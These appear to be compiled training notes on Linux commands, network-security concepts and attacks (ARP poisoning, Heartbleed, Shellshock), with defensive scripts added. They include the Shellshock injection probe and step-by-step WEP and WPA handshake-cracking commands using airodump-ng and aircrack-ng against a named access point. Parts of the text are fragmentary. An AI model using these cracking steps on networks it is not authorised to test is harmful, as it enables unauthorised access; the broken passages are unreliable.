3. “3.8.0-19-generic“: The kernel release.
4. “#30-Ubuntu SMP“: The kernel version.
5. “i686“: The architecture of the processor.
6. “GNU/Linux“: The operating system name.
6.Command: history
The “history” command stands for History (Event) Record; it prints the history of the long
list of commands executed in the terminal.
root@tecmint:~# history
10 pwd
12 cd /usr/share/unity/icons/
13 cd /usr/share/unity
Note: Pressing “Ctrl + R” and then searching for already executed commands lets
your command be completed with the auto completion feature.
(reverse-i-search)`if': ifconfig
7.Command: mkdir
The “mkdir” (Make directory) command creates a new directory with the given name/path.
However, if the directory already exists, it will return an error message “cannot create
folder, folder already exists”.
root@tecmint:~# mkdir tecmint
mkdir: cannot create directory `tecmint‘: File exists
Note: A directory can only be created inside a folder in which the user has write
permission.
(Don’t confuse with file in the above output, you might remember what I said at the
beginning – in Linux every file, folder, drive, command and script is treated as a file).
8.Command: touch
The “touch” command stands for (Update the access and modification times of
each FILE to the current time). touch creates the file only if it doesn’t exist. If
the file already exists it updates the timestamp and not the contents of the file.
Note: touch can be used to create a file under a directory on which the user has write
permission, only if the file doesn’t already exist there.
9.Command: chmod
The Linux “chmod” command stands for (change file mode bits). chmod changes the file
mode (permission) of each given file, folder, script, etc. according to the mode asked for.
There exist 3 types of permission on a file (folder or anything, but to keep things simple
we will be using a file).
Read (r)=4
Write(w)=2
Execute(x)=1
So if you want to give only read permission on a file it will be assigned a value of ‘4‘, for
write permission only, a value of ‘2‘ and for execute permission only, a value of ‘1‘ is to
be given. For read and write permission 4+2 = ‘6‘ is to be given, and so on.
Now permission needs to be set for 3 kinds of user and usergroup. The first is the owner,
then the usergroup and finally the world.
rwxr-x--x abc.sh
Here the owner’s permission is rwx (read, write and execute),
the usergroup to which it belongs has r-x (read and execute only, no write permission) and
the world has --x (only execute).
To change its permission and provide read, write and execute permission to owner,
group and world, each triple is 4+2+1, i.e. mode 777.
Read, write and execute to owner and only execute to group and world is mode 711.
Note: one of the most important commands, useful for sysadmin and user both. In a
multi-user environment or on a server this command comes to the rescue: setting the wrong
permission either makes a file inaccessible or grants unauthorized access to
someone. Mode 777 on a script, for example, lets any local user rewrite what root will later execute.
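The r=4, w=2, x=1 arithmetic above carried through in working code, as an added example that is not from the original page: it converts an ls-style permission string to the octal mode, applies the 711 and 777 modes discussed, reads them back and audits a scratch directory for world-writable files, the misconfiguration the note warns about. The directory and file names are made up.

```shell
#!/bin/sh
# Added example, not from the original page: carry the r=4, w=2, x=1
# arithmetic through in code, apply the modes, read them back and audit
# for world-writable files. File and directory names are made up.

# mode_to_octal SYMBOLIC: "rwxr-x--x" -> 751, one digit per owner/group/world triple
mode_to_octal() {
    mo_sym=$1
    mo_octal=""
    for mo_start in 1 4 7; do
        mo_triple=$(printf '%s' "$mo_sym" | cut -c "$mo_start-$((mo_start + 2))")
        mo_n=0
        case $mo_triple in r??) mo_n=$((mo_n + 4)) ;; esac
        case $mo_triple in ?w?) mo_n=$((mo_n + 2)) ;; esac
        case $mo_triple in ??x) mo_n=$((mo_n + 1)) ;; esac
        mo_octal="$mo_octal$mo_n"
    done
    printf '%s\n' "$mo_octal"
}

# current_mode PATH: the nine permission characters ls -l shows for PATH
current_mode() {
    ls -ld "$1" | cut -c 2-10
}

# count_world_writable DIR: number of regular files under DIR that any user may write
count_world_writable() {
    find "$1" -type f -perm -002 | wc -l | tr -d ' '
}

# demo: scratch directory holding the two modes discussed in the text
demo() {
    d_dir=$(mktemp -d)
    : > "$d_dir/abc.sh"
    : > "$d_dir/notes.txt"
    chmod "$(mode_to_octal rwx--x--x)" "$d_dir/abc.sh"     # 711: owner all, others execute only
    chmod "$(mode_to_octal rwxrwxrwx)" "$d_dir/notes.txt"  # 777: the setting the note warns about
    printf 'abc.sh mode: %s\n' "$(current_mode "$d_dir/abc.sh")"
    printf 'world-writable files under %s: %s\n' "$d_dir" "$(count_world_writable "$d_dir")"
    rm -rf "$d_dir"
}
```

Run count_world_writable against /etc or a web root on a real server to find the files the note is talking about; find -perm -002 is the POSIX spelling of "writable by others".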
10.Command: apt
The Debian-based “apt” command stands for (Advanced Package Tool). Apt is an
advanced package manager for Debian-based systems (Ubuntu, Kubuntu, etc.) that
automatically and intelligently searches, installs, updates and resolves dependencies of
packages on a GNU/Linux system from the command line.
root@tecmint:~# apt-get install mplayer
java-wrappers
Suggested packages:
Note: The above commands result in system-wide changes and hence require the root password (check for ‘#‘ and not
‘$’ as the prompt). Apt plays the same role on Debian-based systems that yum plays on RPM-based ones. Apt verifies the signatures on the package indexes it downloads against the keys under /etc/apt/trusted.gpg.d, so any third-party repository and key you add to sources.list is trusted to supply any package; add them sparingly.
As the name suggests, apt-cache search looks for packages whose name or description contains mplayer. apt-get install, update all the
Read more about apt-get and apt-cache commands at 25 APT-GET and APT-CACHE Commands.
(source:-www.tecmint.com)
Network Security is the process of securing the network in such a way that no
unauthorized person can do harm to our network. The basic purpose of securing a network
is to secure the data of the systems lying in our network. Network Security is a level of
guarantee that all machines in a network are working properly and in a secure way. Network
Security consists of various policies to prevent and monitor unauthorized access,
misuse, modification or denial of computer resources. Network Security involves the
authorization of access to data in a network to legitimate users, which is controlled by the
Network Administrator.
Basics of Networking
Routers
Switches
Internet
Intranet
Network- LAN, MAN, WAN
Terminologies
Star, Ring, Bus, Mesh.
IP- Public Private
Default Gateways
Wireless networks come into action when the use of a physical network becomes
troublesome for a mesh network. A physical network is difficult to maintain and expensive, as
various physical media are required to establish connections with end users. Physical
media include switches, hubs, cables, connections, maintenance, etc.
They do this via a router with DHCP built into it. First company to bring you such a
wireless router: D-Link.
In the beginning this created a problem for the network administrator maintaining the network, as
any person could connect to the network without any authentication process, so it
was less secure than the physical network.
WPA
• WPA builds upon WEP, making it more secure by adding extra security mechanisms
and algorithms (TKIP with per-packet keys and a message integrity check) to stop unauthorized access.
• WPA delivers a level of security well beyond anything that WEP can offer.
• The primary difference between WPA and WPA2 is that WPA2 uses a more
advanced encryption technique, AES (Advanced Encryption Standard, in CCMP mode), in place of TKIP/RC4.
• We prefer WPA2 because its cipher has no known practical break; what attackers
target instead is the pre-shared key, which an offline dictionary attack on a captured handshake recovers whenever the passphrase is weak (see Attacks On WPA/WPA2 below).
• AES is designed so that statistical analysis of the ciphertext gives nothing away. WPA2 is based
upon the Institute of Electrical and Electronics Engineers’ (IEEE)
2. Clients
3. Broadcasting
4. Beacon Packets
5. Data Packets
6. IVs
7. ESSID
8. BSSID
9. Channels
10. Authentication
11. Deauthentication
12. Association
13. Interfaces
Network Attacks:
• DOS Attack
• Network Sniffing
• Botnet Attack
ARP Poisoning
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a
technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP)
messages onto a local area network. Generally, the aim is to associate the attacker's
MAC address with the IP address of another host, such as the default gateway, causing
any traffic meant for that IP address to be sent to the attacker instead.
ARP spoofing may allow an attacker to intercept data frames on a network, modify the
traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such
as denial of service, man in the middle, or session hijacking attacks.
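Detection logic for the poisoning described above, as an added example that is not from the original page: it reads the kernel neighbour table (the output of ip neigh show), flags any MAC address that answers for more than one IP, and checks the gateway's MAC against a value recorded when the network was known-good. The sample table is constructed for the example, not captured from a real network.

```shell
#!/bin/sh
# Added example, not from the original page: spot ARP poisoning in the kernel
# neighbour table. SAMPLE_NEIGH is a constructed `ip neigh show` listing in
# which the gateway and a second host claim the same MAC; on a live box pipe
# the real `ip neigh show` output in instead.

SAMPLE_NEIGH='192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.10 dev wlan0 lladdr aa:bb:cc:dd:ee:01 STALE
192.168.1.37 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.50 dev wlan0 lladdr aa:bb:cc:dd:ee:02 DELAY'

# duplicate_macs: read `ip neigh` lines on stdin and print every MAC that answers
# for more than one IP as "MAC: ip ip ...". Fields: ip dev IFACE lladdr MAC STATE;
# entries without lladdr (FAILED/INCOMPLETE) are skipped. The gateway sharing
# a MAC with a workstation is the classic poisoning signature.
duplicate_macs() {
    awk '$4 == "lladdr" { ips[$5] = ips[$5] " " $1; seen[$5]++ }
         END { for (m in seen) if (seen[m] > 1) print m ":" ips[m] }' | sort
}

# gateway_mac GATEWAY_IP: the MAC the table currently holds for the gateway
gateway_mac() {
    awk -v gw="$1" '$1 == gw && $4 == "lladdr" { print $5; exit }'
}

# check_gateway GATEWAY_IP KNOWN_GOOD_MAC: succeed only if the table still
# agrees with the MAC recorded when the network was known-good
check_gateway() {
    [ "$(gateway_mac "$1")" = "$2" ]
}

# demo: run both checks over the constructed sample
demo() {
    printf '%s\n' "$SAMPLE_NEIGH" | duplicate_macs
    if printf '%s\n' "$SAMPLE_NEIGH" | check_gateway 192.168.1.1 00:11:22:33:44:55; then
        echo "gateway MAC unchanged"
    else
        echo "gateway MAC changed: possible ARP poisoning"
    fi
}
```

A static ARP entry for the gateway (ip neigh replace ... lladdr ... nud permanent) stops the cache from being rewritten at all; the checks above are what you run on hosts where that is impractical.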
SSL Stripping
An attacker in the path between client and server rewrites the HTTPS links and redirects in the server's responses to plain HTTP, so the victim's browser talks to the attacker in clear text while the attacker talks to the server over TLS; HSTS is the standard defence.
Heartbleed
The Heartbleed bug (CVE-2014-0160) allows anyone on the Internet to read the memory of systems
protected by vulnerable versions of the OpenSSL software (1.0.1 through 1.0.1f; fixed in 1.0.1g). This compromises the
secret keys used to identify the service providers and to encrypt the traffic, the names
and passwords of the users and the actual content. This allows attackers to eavesdrop
on communications, steal data directly from the services and users and to impersonate
services and users.
Shellshock
“Shellshock” refers to vulnerabilities found in Bash, a common command-line shell for
Linux and Unix systems.
Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix
Bash shell, the first of which (CVE-2014-6271) was disclosed on 24 September 2014. Bash executed
commands appended after a function definition imported from an environment variable, so any
service that places attacker-controlled strings in the environment (CGI scripts fed HTTP headers,
DHCP clients, SSH ForceCommand) could be made to run arbitrary commands.
• CVE-2014-6271,
• CVE-2014-6277,
• CVE-2014-6278,
• CVE-2014-7169,
• CVE-2014-7186, and
• CVE-2014-7187
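The published self-test for the first Shellshock bug (CVE-2014-6271), wrapped as an added example that is not from the original page: a vulnerable bash imports the function definition held in the environment variable x and then executes the command appended after it; a patched bash ignores the trailing command. Only the probe's own output is inspected, nothing else is run.

```shell
#!/bin/sh
# Added example, not from the original page: the published self-test for
# CVE-2014-6271. A vulnerable bash imports the function definition held in
# the environment variable x and then runs the command appended after it;
# a patched bash ignores the trailing command.

# shellshock_status: print "vulnerable", "patched" or "bash-missing"
shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo bash-missing; return 0; }
    # The variable value is a function body followed by an extra command.
    # Patched bash prints only "probe"; vulnerable bash prints "vulnerable" first.
    ss_out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case $ss_out in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}
```

This probe covers only the first CVE; the later ones in the list above needed separate tests, which is why the fix shipped in several rounds.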
Capturing the packets exchanged between the AP and its users (a wireless card in monitor mode sees
them without being in the path) can be done in two ways, i.e. with a GUI or a CLI based application.
For the GUI we can use the Wireshark packet capturing tool, which is available for Windows and Linux operating
systems.
For the CLI, a tool called airodump-ng is used, which is built into Kali Linux.
# Wireshark Capturing
# Filtering
# Airodump
WEP – Wired Equivalent Privacy (1997)
The flaws in WEP make it susceptible to various statistical cracking techniques. WEP
uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) never repeat.
WEP's IV is only 24 bits and is sent in the clear, so the implementation of RC4 in WEP repeats IVs
frequently on a busy network.
• If we can capture enough IVs, we can recover the key!
# Cracking
ifconfig -a
ifconfig wlan0 up
airodump-ng mon0
ifconfig -a
airodump-ng mon0
airodump-ng
ls
aircrack-ng palvinder-02.cap
(mon0 is the monitor-mode interface created by airmon-ng start wlan0, as shown in the WPA/WPA2
sequence below; the capture file palvinder-02.cap comes from an airodump-ng run with -w palvinder, as in that sequence.)
Attacks On WPA/WPA2
ifconfig -a
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
ifconfig -a
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0
airodump-ng
airodump-ng -c 1 --bssid C8:D3:A3:2F:D6:F4 -w palvinder mon0
ls
aircrack-ng palvinder-02.cap -w '/root/Desktop/passwords1.lst'
(aircrack-ng needs a captured WPA 4-way handshake in the .cap file; it then tries every entry of the
wordlist offline, so the attack succeeds only if the passphrase is in the list. A long random passphrase defeats it.)
A mobile operating system (or mobile OS) is an operating system for smartphones,
tablets, PDAs, or other mobile devices. While computers such as the typical laptop are
mobile, the operating systems usually used on them are not considered mobile ones as
they were originally designed for bigger stationary desktop computers that historically
did not have or need specific "mobile" features. This distinction is getting blurred in
some newer operating systems that are hybrids made for both uses.